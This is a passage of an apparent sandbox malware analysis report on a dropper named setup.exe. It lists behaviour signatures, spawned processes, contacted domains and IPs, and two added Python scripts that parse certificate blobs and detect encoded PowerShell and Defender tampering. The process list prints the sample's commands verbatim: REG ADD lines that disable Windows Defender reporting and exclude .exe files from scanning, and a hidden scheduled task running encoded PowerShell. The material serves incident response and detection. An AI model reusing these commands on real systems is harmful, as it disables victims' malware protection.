| Key value queried | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA | C:\Users\Admin\AppData\Local\Temp\setup.exe | N/A |
Legitimate hosting services abused for malware hosting/C2
| Description | Indicator | Process | Target |
| N/A | iplogger.org | N/A | N/A |
| N/A | iplogger.org | N/A | N/A |
| N/A | iplogger.org | N/A | N/A |
| N/A | iplogger.org | N/A | N/A |
Looks up external IP address via web service
| Description | Indicator | Process | Target |
| N/A | ipinfo.io | N/A | N/A |
| N/A | api.myip.com | N/A | N/A |
| N/A | api.myip.com | N/A | N/A |
| N/A | ipinfo.io | N/A | N/A |
| N/A | ipinfo.io | N/A | N/A |
| N/A | api.myip.com | N/A | N/A |
| N/A | api.myip.com | N/A | N/A |
| N/A | ipinfo.io | N/A | N/A |
Drops file in System32 directory
| Description | Indicator | Process | Target |
| File opened for modification | C:\Windows\System32\GroupPolicy\GPT.INI | C:\Users\Admin\AppData\Local\Temp\setup.exe | N/A |
| File opened for modification | C:\Windows\System32\GroupPolicy | C:\Users\Admin\AppData\Local\Temp\setup.exe | N/A |
| File opened for modification | C:\Windows\System32\GroupPolicy\gpt.ini | C:\Users\Admin\AppData\Local\Temp\setup.exe | N/A |
| File created | C:\Windows\System32\GroupPolicy\Machine\Registry.pol | C:\Users\Admin\AppData\Local\Temp\setup.exe | N/A |
Suspicious use of NtSetInformationThreadHideFromDebugger
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\setup.exe | N/A |
Program crash
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\SysWOW64\WerFault.exe | C:\Users\Admin\Documents\GuardFox\rt1S04Jegwg5fVerEbHNeyXS.exe |
Creates scheduled task(s)
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\SysWOW64\schtasks.exe | N/A |
Modifies system certificate store
| Description | Indicator | Process | Target |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\D4DE20D05E66FC53FE1A50882C78DB2852CAE474 | C:\Users\Admin\AppData\Local\Temp\setup.exe | N/A |
| Set value (data) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\D4DE20D05E66FC53FE1A50882C78DB2852CAE474\Blob = … | C:\Users\Admin\AppData\Local\Temp\setup.exe | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\CABD2A79A1076A31F21D253635CB039D4329A5E8 | C:\Users\Admin\AppData\Local\Temp\setup.exe | N/A |
| Set value (data) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\DAC9024F54D8F6DF94935FB1732638CA6AD77C13\Blob = … | C:\Users\Admin\AppData\Local\Temp\setup.exe | N/A |
| Set value (data) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\DAC9024F54D8F6DF94935FB1732638CA6AD77C13\Blob = 040000000100000010000000410352dc0ff7501b16f0028eba6f45c50f00000001000000140000005bcaa1c2780f0bcb5a90770451d96f38963f012d0b000000010000001e000000440053005400200052006f006f0074002000430041002000580033000000090000000100000016000000301406082b0601050507030406082b06010505070301140000000100000014000000c4a7b1a47b2c71fadbe14b9075ffc415608589101d00000001000000100000004558d512eecb27464920897de7b66053030000000100000014000000dac9024f54d8f6df94935fb1732638ca6ad77c131900000001000000100000006cf252fec3e8f20996de5d4dd9aef42420000000010000004e0300003082034a30820232a003020102021044afb080d6a327ba893039862ef8406b300d06092a864886f70d0101050500303f31243022060355040a131b4469676974616c205369676e617475726520547275737420436f2e311730150603550403130e44535420526f6f74204341205833301e170d3030303933303231313231395a170d3231303933303134303131355a303f31243022060355040a131b4469676974616c205369676e617475726520547275737420436f2e311730150603550403130e44535420526f6f7420434120583330820122300d06092a864886f70d01010105000382010f003082010a0282010100dfafe99750088357b4cc6265f69082ecc7d32c6b30ca5becd9c37dc740c118148be0e83376492ae33f214993ac4e0eaf3e48cb65eefcd3210f65d22ad9328f8ce5f777b0127bb595c089a3a9baed732e7a0c063283a27e8a1430cd11a0e12a38b9790a31fd50bd8065dfb7516383c8e28861ea4b6181ec526bb9a2e24b1a289f48a39e0cda098e3e172e1edd20df5bc62a8aab2ebd70adc50b1a25907472c57b6aab34d63089ffe568137b540bc8d6aeec5a9c921e3d64b38cc6dfbfc94170ec1672d526ec38553943d0fcfd185c40f197ebd59a9b8d1dbada25b9c6d8dfc115023aabda6ef13e2ef55c089c3cd68369e4109b192ab62957e3e53d9b9ff0025d0203010001a3423040300f0603551d130101ff040530030101ff300e0603551d0f0101ff040403020106301d0603551d0e04160414c4a7b1a47b2c71fadbe14b9075ffc41560858910300d06092a864886f70d01010505000382010100a31a2c9b17005ca91eee2866373abf83c73f4bc309a095205de3d95944d23e0d3ebd8a4ba0741fce10829c741a1d7e981addcb134bb32044e491e9ccfc7da5db6ae5fee6fde04eddb7003ab57049aff2e5eb02f1d1028b19cb943a5e48c4181e58195f1e025af00cf1b1ada9dc59868b6ee991f586cafab96633aa595bcee2a7167347cb2bcc99b03748cfe3564bf5cf0f0c723287c6f044bb53726d43f526489a5267b758abfe67767178db0da256141339243185a2a8025a3047e1dd5007bc02099000eb6463609b16bc88c912e6d27d918bf93d328d65b4e97cb15776eac5b62839bf15651cc8f677966a0a8d770bd8910b048e07db29b60aee9d82353510 | C:\Users\Admin\AppData\Local\Temp\setup.exe | N/A |
| Set value (data) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\D4DE20D05E66FC53FE1A50882C78DB2852CAE474\Blob = … | C:\Users\Admin\AppData\Local\Temp\setup.exe | N/A |
| Set value (data) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\CABD2A79A1076A31F21D253635CB039D4329A5E8\Blob = … | C:\Users\Admin\AppData\Local\Temp\setup.exe | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\DAC9024F54D8F6DF94935FB1732638CA6AD77C13 | C:\Users\Admin\AppData\Local\Temp\setup.exe | N/A |
| Set value (data) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\DAC9024F54D8F6DF94935FB1732638CA6AD77C13\Blob = … | C:\Users\Admin\AppData\Local\Temp\setup.exe | N/A |
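The Blob value under a SystemCertificates\...\Certificates\<thumbprint> key is not the bare certificate. It is a CryptoAPI serialized property list: a sequence of (property id, reserved = 1, length, data) records in which the DER certificate is only the last entry (CERT_CERT_PROP_ID, 32), preceded by cached properties such as the SHA-1 hash (3), the friendly name (11) and the enhanced key usage (9). The Python below is an added example written for this page, not part of the sandbox report or of any tool the report names. It parses the leading bytes of the DAC9024F... blob copied from the row above (the 846-byte DER body is cut after 31 bytes, so the parser's truncation handling is exercised on purpose), reads out the friendly name, the stored thumbprint, the EKU OIDs and the certificate serial, and on a complete blob re-hashes the DER to confirm the stored thumbprint. The function names and the small test fixture produced by build_blob are mine.

```python
import hashlib
import struct

# CryptoAPI property IDs (wincrypt.h CERT_*_PROP_ID) that occur in this blob.
PROP_NAMES = {3: 'SHA1_HASH', 4: 'MD5_HASH', 9: 'ENHKEY_USAGE', 11: 'FRIENDLY_NAME',
              15: 'SIGNATURE_HASH', 20: 'KEY_IDENTIFIER', 25: 'SUBJECT_PUBLIC_KEY_MD5_HASH',
              29: 'SUBJECT_NAME_MD5_HASH', 32: 'CERT'}

# Leading bytes of the Blob written under ...\AuthRoot\Certificates\DAC9024F..., copied
# from the report row above. The 846-byte DER certificate in the final property is cut
# after 31 bytes, so that property is deliberately truncated in this sample input.
REPORT_BLOB_PREFIX = bytes.fromhex(
    '040000000100000010000000410352dc0ff7501b16f0028eba6f45c5'
    '0f00000001000000140000005bcaa1c2780f0bcb5a90770451d96f38963f012d'
    '0b000000010000001e000000440053005400200052006f006f0074002000430041002000580033000000'
    '090000000100000016000000301406082b0601050507030406082b06010505070301'
    '140000000100000014000000c4a7b1a47b2c71fadbe14b9075ffc41560858910'
    '1d00000001000000100000004558d512eecb27464920897de7b66053'
    '030000000100000014000000dac9024f54d8f6df94935fb1732638ca6ad77c13'
    '1900000001000000100000006cf252fec3e8f20996de5d4dd9aef424'
    '20000000010000004e030000'
    '3082034a30820232a003020102021044afb080d6a327ba893039862ef8406b')

def parse_cert_blob(blob):
    """Walk the property list: DWORD propid, DWORD reserved (always 1), DWORD cbData,
    then cbData bytes, repeated to the end. A short final entry is flagged, not dropped."""
    props, off = [], 0
    while off + 12 <= len(blob):
        prop_id, reserved, length = struct.unpack_from('<III', blob, off)
        if reserved != 1:
            raise ValueError('not a CryptoAPI certificate property blob')
        data = blob[off + 12:off + 12 + length]
        props.append({'id': prop_id, 'name': PROP_NAMES.get(prop_id, 'PROP_%d' % prop_id),
                      'declared_len': length, 'data': data, 'truncated': len(data) < length})
        off += 12 + length
    return props

def _tlv(buf, off):
    """Read one DER tag and length; return (tag, length, offset of the value)."""
    tag, ln, off = buf[off], buf[off + 1], off + 2
    if ln & 0x80:                       # long form: low 7 bits give the length-of-length
        n = ln & 0x7F
        ln, off = int.from_bytes(buf[off:off + n], 'big'), off + n
    return tag, ln, off

def decode_oid(raw):
    arcs, val = [raw[0] // 40, raw[0] % 40], 0   # first octet packs the first two arcs
    for b in raw[1:]:                   # base-128, high bit set on all but the last byte
        val = (val << 7) | (b & 0x7F)
        if not b & 0x80:
            arcs.append(val)
            val = 0
    return '.'.join(map(str, arcs))

def parse_eku(der):
    """ENHKEY_USAGE property: SEQUENCE OF OBJECT IDENTIFIER."""
    _, ln, off = _tlv(der, 0)
    oids, end = [], off + ln
    while off < end:
        _, ln, off = _tlv(der, off)
        oids.append(decode_oid(der[off:off + ln]))
        off += ln
    return oids

def cert_serial(der):
    """Certificate -> tbsCertificate -> optional [0] version -> INTEGER serialNumber."""
    _, _, off = _tlv(der, 0)
    _, _, off = _tlv(der, off)
    tag, ln, off = _tlv(der, off)
    if tag == 0xA0:
        tag, ln, off = _tlv(der, off + ln)
    if tag != 0x02:
        raise ValueError('serialNumber INTEGER not found')
    return der[off:off + ln].hex()

def describe_blob(blob):
    info = {'friendly_name': None, 'sha1_thumbprint': None, 'eku': None, 'serial': None,
            'cert_declared_len': None, 'cert_truncated': None, 'sha1_matches': None}
    for p in parse_cert_blob(blob):
        if p['id'] == 11:
            info['friendly_name'] = p['data'].decode('utf-16-le').rstrip('\x00')
        elif p['id'] == 3:
            info['sha1_thumbprint'] = p['data'].hex().upper()
        elif p['id'] == 9:
            info['eku'] = parse_eku(p['data'])
        elif p['id'] == 32:
            info['cert_declared_len'], info['cert_truncated'] = p['declared_len'], p['truncated']
            info['serial'] = cert_serial(p['data'])
            if not p['truncated']:      # only a complete DER body can be re-hashed
                info['sha1_matches'] = (hashlib.sha1(p['data']).hexdigest().upper()
                                        == info['sha1_thumbprint'])
    return info

def build_blob(der, extra=()):
    """Serialize a minimal property list the way the store does for a bare certificate:
    SHA1_HASH, any extra (id, data) pairs, then CERT. Handy for building test fixtures."""
    props = [(3, hashlib.sha1(der).digest())] + list(extra) + [(32, der)]
    return b''.join(struct.pack('<III', pid, 1, len(d)) + d for pid, d in props)
```

On this blob the friendly name reads DST Root CA X3, the stored thumbprint equals the key name, and the EKU list is serverAuth and emailProtection. The other two thumbprints in the table, CABD2A79... and D4DE20D0..., are those of ISRG Root X1 and Baltimore CyberTrust Root. Together with the CryptnetUrlCache entries under Files and the connections to apps.identrust.com and x2.c.lencr.org in the Network table, this is the footprint of the Windows automatic root update fetching roots it needs to validate a TLS chain; it is logged against setup.exe because CryptoAPI does that work inside the calling process. Read this signature as context for the sample's TLS traffic rather than as evidence of a planted CA, and reserve concern for blobs whose re-hashed thumbprint is not a publicly known root.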
Suspicious behavior: EnumeratesProcesses
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\setup.exe | N/A |
Processes
C:\Users\Admin\AppData\Local\Temp\setup.exe
"C:\Users\Admin\AppData\Local\Temp\setup.exe"
C:\Users\Admin\Documents\GuardFox\hCzF7_6YmH1_yf7_aqOxLH8Z.exe
"C:\Users\Admin\Documents\GuardFox\hCzF7_6YmH1_yf7_aqOxLH8Z.exe"
C:\Users\Admin\Documents\GuardFox\cYGzvU0LJ7j1zdGYxn6a3LQ0.exe
"C:\Users\Admin\Documents\GuardFox\cYGzvU0LJ7j1zdGYxn6a3LQ0.exe"
C:\Users\Admin\Documents\GuardFox\F6KP3rqn3LyQ85jnZsjhblYG.exe
"C:\Users\Admin\Documents\GuardFox\F6KP3rqn3LyQ85jnZsjhblYG.exe"
C:\Users\Admin\Documents\GuardFox\wD7ladKU51wCHrt1VQbncYVb.exe
"C:\Users\Admin\Documents\GuardFox\wD7ladKU51wCHrt1VQbncYVb.exe"
C:\Users\Admin\Documents\GuardFox\oGELkeJJiv2cefOIHJeNoVfO.exe
"C:\Users\Admin\Documents\GuardFox\oGELkeJJiv2cefOIHJeNoVfO.exe"
C:\Users\Admin\Documents\GuardFox\qkR4Fs3GyEEMio3bz99eB7ke.exe
"C:\Users\Admin\Documents\GuardFox\qkR4Fs3GyEEMio3bz99eB7ke.exe"
C:\Users\Admin\Documents\GuardFox\nHczuLMIyPOo3HNGLcZReWeM.exe
"C:\Users\Admin\Documents\GuardFox\nHczuLMIyPOo3HNGLcZReWeM.exe"
C:\Users\Admin\Documents\GuardFox\I6UCCRLwkIvkU0kr5pn9tAke.exe
"C:\Users\Admin\Documents\GuardFox\I6UCCRLwkIvkU0kr5pn9tAke.exe"
C:\Users\Admin\AppData\Local\Temp\is-QAESQ.tmp\F6KP3rqn3LyQ85jnZsjhblYG.tmp
"C:\Users\Admin\AppData\Local\Temp\is-QAESQ.tmp\F6KP3rqn3LyQ85jnZsjhblYG.tmp" /SL5="$60120,4078676,54272,C:\Users\Admin\Documents\GuardFox\F6KP3rqn3LyQ85jnZsjhblYG.exe"
C:\Users\Admin\Documents\GuardFox\rt1S04Jegwg5fVerEbHNeyXS.exe
"C:\Users\Admin\Documents\GuardFox\rt1S04Jegwg5fVerEbHNeyXS.exe"
C:\Users\Admin\Documents\GuardFox\a0ffCtiHkAWh2WQD6jibWWLE.exe
"C:\Users\Admin\Documents\GuardFox\a0ffCtiHkAWh2WQD6jibWWLE.exe"
C:\Users\Admin\AppData\Local\Temp\7zSC3DB.tmp\Install.exe
.\Install.exe
C:\Users\Admin\AppData\Local\Temp\7zSC65B.tmp\Install.exe
.\Install.exe /iFFhdidlQI "525403" /S
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
powershell Get-WmiObject -Namespace root\SecurityCenter2 -Class AntiVirusProduct
C:\Users\Admin\AppData\Local\Temp\5A60.exe
C:\Users\Admin\AppData\Local\Temp\5A60.exe
C:\Users\Admin\AppData\Local\Temp\5A60.exe
C:\Users\Admin\AppData\Local\Temp\5A60.exe
C:\Users\Admin\AppData\Local\Temp\75DC.exe
C:\Users\Admin\AppData\Local\Temp\75DC.exe
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe"
C:\Windows\SysWOW64\forfiles.exe
"C:\Windows\System32\forfiles.exe" /p c:\windows\system32 /m cmd.exe /c "cmd /C REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions\" /f /v \"exe\" /t REG_SZ /d 0 /reg:32&REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions\" /f /v \"exe\" /t REG_SZ /d 0 /reg:64&"
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" --url=https://clients2.google.com/cr/report --annotation=channel= --annotation=plat=Win64 --annotation=prod=Chrome --annotation=ver=106.0.5249.119 --initial-client-data=0xc0,0xc4,0xc8,0x94,0xcc,0x7fef68f9758,0x7fef68f9768,0x7fef68f9778
C:\Users\Admin\AppData\Local\Temp\8806.exe
C:\Users\Admin\AppData\Local\Temp\8806.exe
\??\c:\windows\SysWOW64\reg.exe
REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /f /v "SpyNetReporting" /t REG_DWORD /d 0 /reg:32
\??\c:\windows\SysWOW64\reg.exe
REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /f /v "SpyNetReporting" /t REG_DWORD /d 0 /reg:64
\??\c:\windows\SysWOW64\reg.exe
REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /f /v "exe" /t REG_SZ /d 0 /reg:64
C:\Users\Admin\AppData\Local\Temp\AB02.exe
C:\Users\Admin\AppData\Local\Temp\AB02.exe
C:\Users\Admin\AppData\Local\Temp\BE83.exe
C:\Users\Admin\AppData\Local\Temp\BE83.exe
C:\Users\Admin\AppData\Local\Temp\D83B.exe
C:\Users\Admin\AppData\Local\Temp\D83B.exe
\??\c:\windows\SysWOW64\reg.exe
REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /f /v "exe" /t REG_SZ /d 0 /reg:32
C:\Windows\SysWOW64\schtasks.exe
schtasks /CREATE /TN "gJhmruKOq" /SC once /ST 02:47:59 /F /RU "Admin" /TR "powershell -WindowStyle Hidden -EncodedCommand cwB0AGEAcgB0AC0AcAByAG8AYwBlAHMAcwAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZABlAG4AIABnAHAAdQBwAGQAYQB0AGUALgBlAHgAZQAgAC8AZgBvAHIAYwBlAA=="
C:\Users\Admin\AppData\Local\Temp\is-20Q4N.tmp\BE83.tmp
"C:\Users\Admin\AppData\Local\Temp\is-20Q4N.tmp\BE83.tmp" /SL5="$50184,4061719,54272,C:\Users\Admin\AppData\Local\Temp\BE83.exe"
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 1812 -s 580
C:\Users\Admin\AppData\Local\Temp\E42E.exe
C:\Users\Admin\AppData\Local\Temp\E42E.exe
C:\Users\Admin\AppData\Local\Temp\288c47bbc1871b439df19ff4df68f076.exe
"C:\Users\Admin\AppData\Local\Temp\288c47bbc1871b439df19ff4df68f076.exe"
C:\Users\Admin\AppData\Local\Temp\is-C0DOH.tmp\E42E.tmp
"C:\Users\Admin\AppData\Local\Temp\is-C0DOH.tmp\E42E.tmp" /SL5="$40164,4061719,54272,C:\Users\Admin\AppData\Local\Temp\E42E.exe"
C:\Windows\SysWOW64\schtasks.exe
schtasks /run /I /tn "gJhmruKOq"
C:\Windows\SysWOW64\cmd.exe
/C REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /f /v "exe" /t REG_SZ /d 0 /reg:32&REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /f /v "exe" /t REG_SZ /d 0 /reg:64&
C:\Windows\SysWOW64\cmd.exe
/C REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /f /v "SpyNetReporting" /t REG_DWORD /d 0 /reg:32&REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /f /v "SpyNetReporting" /t REG_DWORD /d 0 /reg:64&
C:\Windows\SysWOW64\forfiles.exe
"C:\Windows\System32\forfiles.exe" /p c:\windows\system32 /m cmd.exe /c "cmd /C REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet\" /f /v \"SpyNetReporting\" /t REG_DWORD /d 0 /reg:32&REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet\" /f /v \"SpyNetReporting\" /t REG_DWORD /d 0 /reg:64&"
C:\Windows\system32\taskeng.exe
taskeng.exe {1811B231-21B9-4379-9E95-8CE9F2C3F775} S-1-5-21-1298544033-3225604241-2703760938-1000:IZKCKOTP\Admin:Interactive:[1]
C:\Users\Admin\AppData\Local\Temp\InstallSetup4.exe
"C:\Users\Admin\AppData\Local\Temp\InstallSetup4.exe"
C:\Windows\system32\regsvr32.exe
regsvr32 /s C:\Users\Admin\AppData\Local\Temp\E89.dll
C:\Users\Admin\AppData\Local\Temp\FourthX.exe
"C:\Users\Admin\AppData\Local\Temp\FourthX.exe"
C:\Users\Admin\AppData\Local\Temp\BroomSetup.exe
C:\Users\Admin\AppData\Local\Temp\BroomSetup.exe
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE -WindowStyle Hidden -EncodedCommand cwB0AGEAcgB0AC0AcAByAG8AYwBlAHMAcwAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZABlAG4AIABnAHAAdQBwAGQAYQB0AGUALgBlAHgAZQAgAC8AZgBvAHIAYwBlAA==
C:\Windows\SysWOW64\regsvr32.exe
/s C:\Users\Admin\AppData\Local\Temp\E89.dll
C:\Windows\system32\makecab.exe
"C:\Windows\system32\makecab.exe" C:\Windows\Logs\CBS\CbsPersist_20240223115727.log C:\Windows\Logs\CBS\CbsPersist_20240223115727.cab
C:\Windows\SysWOW64\schtasks.exe
schtasks /DELETE /F /TN "gJhmruKOq"
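Two things in the process list above deserve a closer look than the signature names give them. First, the scheduled task gJhmruKOq (created, run immediately, then deleted) carries a base64 PowerShell -EncodedCommand, which is UTF-16LE text under base64 and decodes to a hidden start-process of gpupdate.exe /force; read together with the Registry.pol that setup.exe wrote under C:\Windows\System32\GroupPolicy\Machine, that is a forced local Group Policy refresh. Second, the Windows Defender policy keys are written three ways: by reg.exe directly, by cmd.exe, and by forfiles.exe launching cmd.exe, so the REG ADD commands show up with a LOLBin as parent. The Python below is an added example, not part of the report or of any tool it names: it decodes encoded PowerShell arguments and extracts Defender policy writes from command lines copied verbatim from the process list. The regexes and function names are mine.

```python
import base64
import binascii
import re

# Command lines copied from the process list of this report (behavioral27); they are
# the sample input for the triage below. Nothing here is invented.
REPORT_COMMAND_LINES = [
    r'schtasks /CREATE /TN "gJhmruKOq" /SC once /ST 02:47:59 /F /RU "Admin" /TR "powershell -WindowStyle Hidden -EncodedCommand cwB0AGEAcgB0AC0AcAByAG8AYwBlAHMAcwAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZABlAG4AIABnAHAAdQBwAGQAYQB0AGUALgBlAHgAZQAgAC8AZgBvAHIAYwBlAA=="',
    r'REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /f /v "SpyNetReporting" /t REG_DWORD /d 0 /reg:32',
    r'REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /f /v "exe" /t REG_SZ /d 0 /reg:64',
    r'powershell Get-WmiObject -Namespace root\SecurityCenter2 -Class AntiVirusProduct',
    r'regsvr32 /s C:\Users\Admin\AppData\Local\Temp\E89.dll',
    r'"C:\Windows\System32\forfiles.exe" /p c:\windows\system32 /m cmd.exe /c "cmd /C REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet\" /f /v \"SpyNetReporting\" /t REG_DWORD /d 0 /reg:32&REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet\" /f /v \"SpyNetReporting\" /t REG_DWORD /d 0 /reg:64&"',
]

# powershell.exe accepts -e, -ec, -enc and -EncodedCommand; the payload is base64 of UTF-16LE.
ENCODED_RE = re.compile(r'-(?:e|ec|enc|encodedcommand)\s+([A-Za-z0-9+/=]+)', re.IGNORECASE)
# REG ADD "<key>" ... ; the key may be wrapped in \" when it sits inside another quoted string,
# and several REG ADDs can be chained with & on one line.
REG_ADD_RE = re.compile(r'REG\s+ADD\s+\\?"(?P<key>[^"]*?)\\?"(?P<rest>[^&]*)', re.IGNORECASE)
DEFENDER_POLICY_KEY = r'HKLM\SOFTWARE\Policies\Microsoft\Windows Defender'

def decode_encoded_command(cmdline):
    """Return the plaintext of a PowerShell -EncodedCommand argument, or None."""
    m = ENCODED_RE.search(cmdline)
    if not m:
        return None
    try:
        return base64.b64decode(m.group(1)).decode('utf-16-le').rstrip('\x00')
    except (binascii.Error, UnicodeDecodeError):
        return None

def find_defender_tampering(cmdline):
    """Return (key, value_name, data) for every REG ADD under the Defender policy key."""
    hits = []
    for m in REG_ADD_RE.finditer(cmdline):
        key = m.group('key')
        if not key.lower().startswith(DEFENDER_POLICY_KEY.lower()):
            continue
        value = re.search(r'/v\s+\\?"?([^"\s\\]+)', m.group('rest'))
        data = re.search(r'/d\s+(\S+)', m.group('rest'))
        hits.append((key, value.group(1) if value else None, data.group(1) if data else None))
    return hits

def triage(cmdlines):
    """Tag each command line with what it reveals; unremarkable lines produce nothing."""
    findings = []
    for line in cmdlines:
        decoded = decode_encoded_command(line)
        if decoded is not None:
            findings.append(('encoded_powershell', decoded))
        for key, value, data in find_defender_tampering(line):
            # Under Exclusions\Extensions the value *name* is the excluded extension
            # (the data is ignored); SpyNetReporting=0 switches off MAPS cloud reporting.
            findings.append(('defender_policy', f'{key}\\{value} = {data}'))
    return findings

if __name__ == '__main__':
    for kind, detail in triage(REPORT_COMMAND_LINES):
        print(f'{kind:18} {detail}')
```

One caveat for responders: HKLM\SOFTWARE\Policies\Microsoft\Windows Defender is the key that local Group Policy writes from Registry.pol, so deleting the values by hand is not enough if the Registry.pol dropped in this run carries the same settings; the next policy refresh (the very thing the encoded command forces) puts them back. Check and clean C:\Windows\System32\GroupPolicy\Machine\Registry.pol and gpt.ini as well.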
Network
| Country | Destination | Domain | Proto |
| DE | 77.105.147.130:80 | 77.105.147.130 | tcp |
| US | 8.8.8.8:53 | api.myip.com | udp |
| US | 104.26.8.59:443 | api.myip.com | tcp |
| US | 8.8.8.8:53 | ipinfo.io | udp |
| US | 34.117.186.192:443 | ipinfo.io | tcp |
| US | 34.117.186.192:443 | ipinfo.io | tcp |
| US | 8.8.8.8:53 | cczhk.com | udp |
| US | 8.8.8.8:53 | vk.com | udp |
| US | 8.8.8.8:53 | 294down-river.sbs | udp |
| US | 8.8.8.8:53 | monoblocked.com | udp |
| US | 8.8.8.8:53 | acenitive.shop | udp |
| US | 8.8.8.8:53 | triedchicken.net | udp |
| US | 8.8.8.8:53 | cleued.com | udp |
| US | 8.8.8.8:53 | medfioytrkdkcodlskeej.net | udp |
| US | 8.8.8.8:53 | def.bestsup.su | udp |
| RU | 147.45.47.101:80 | 147.45.47.101 | tcp |
| DE | 185.172.128.127:80 | 185.172.128.127 | tcp |
| RU | 87.240.132.67:80 | vk.com | tcp |
| RU | 87.240.132.67:80 | vk.com | tcp |
| US | 104.21.29.103:80 | def.bestsup.su | tcp |
| US | 172.67.215.205:80 | acenitive.shop | tcp |
| US | 172.67.215.205:80 | acenitive.shop | tcp |
| US | 104.21.4.60:80 | cleued.com | tcp |
| RU | 91.215.85.209:80 | medfioytrkdkcodlskeej.net | tcp |
| US | 104.21.67.206:80 | 294down-river.sbs | tcp |
| RU | 45.130.41.108:80 | monoblocked.com | tcp |
| US | 104.21.4.60:80 | cleued.com | tcp |
| US | 172.67.215.205:80 | acenitive.shop | tcp |
| RU | 87.240.132.67:80 | vk.com | tcp |
| RU | 87.240.132.67:80 | vk.com | tcp |
| US | 104.21.67.206:443 | 294down-river.sbs | tcp |
| US | 172.67.215.205:80 | acenitive.shop | tcp |
| US | 104.21.4.60:80 | cleued.com | tcp |
| RU | 91.215.85.209:80 | medfioytrkdkcodlskeej.net | tcp |
| US | 172.67.215.205:80 | acenitive.shop | tcp |
| US | 104.21.4.60:80 | cleued.com | tcp |
| RU | 45.130.41.108:80 | monoblocked.com | tcp |
| US | 172.67.215.205:443 | acenitive.shop | tcp |
| US | 104.21.4.60:443 | cleued.com | tcp |
| RU | 87.240.132.67:80 | vk.com | tcp |
| RU | 87.240.132.67:80 | vk.com | tcp |
| RU | 91.215.85.209:80 | medfioytrkdkcodlskeej.net | tcp |
| KR | 211.119.84.111:80 | cczhk.com | tcp |
| RU | 45.130.41.108:80 | monoblocked.com | tcp |
| RU | 87.240.132.67:80 | vk.com | tcp |
| RU | 87.240.132.67:80 | vk.com | tcp |
| RU | 91.215.85.209:80 | medfioytrkdkcodlskeej.net | tcp |
| US | 8.8.8.8:53 | pergor.com | udp |
| RU | 87.240.132.67:80 | vk.com | tcp |
| RU | 91.215.85.209:443 | medfioytrkdkcodlskeej.net | tcp |
| RU | 87.240.132.67:80 | vk.com | tcp |
| US | 104.21.32.227:443 | pergor.com | tcp |
| RU | 45.130.41.108:80 | monoblocked.com | tcp |
| RU | 45.130.41.108:443 | monoblocked.com | tcp |
| RU | 87.240.132.67:80 | vk.com | tcp |
| RU | 87.240.132.67:80 | vk.com | tcp |
| RU | 87.240.132.67:80 | vk.com | tcp |
| US | 8.8.8.8:53 | apps.identrust.com | udp |
| GB | 96.17.179.205:80 | apps.identrust.com | tcp |
| US | 172.67.180.119:80 | triedchicken.net | tcp |
| RU | 87.240.132.67:80 | vk.com | tcp |
| US | 172.67.180.119:80 | triedchicken.net | tcp |
| US | 172.67.180.119:80 | triedchicken.net | tcp |
| RU | 87.240.132.67:80 | vk.com | tcp |
| US | 172.67.180.119:80 | triedchicken.net | tcp |
| US | 172.67.180.119:443 | triedchicken.net | tcp |
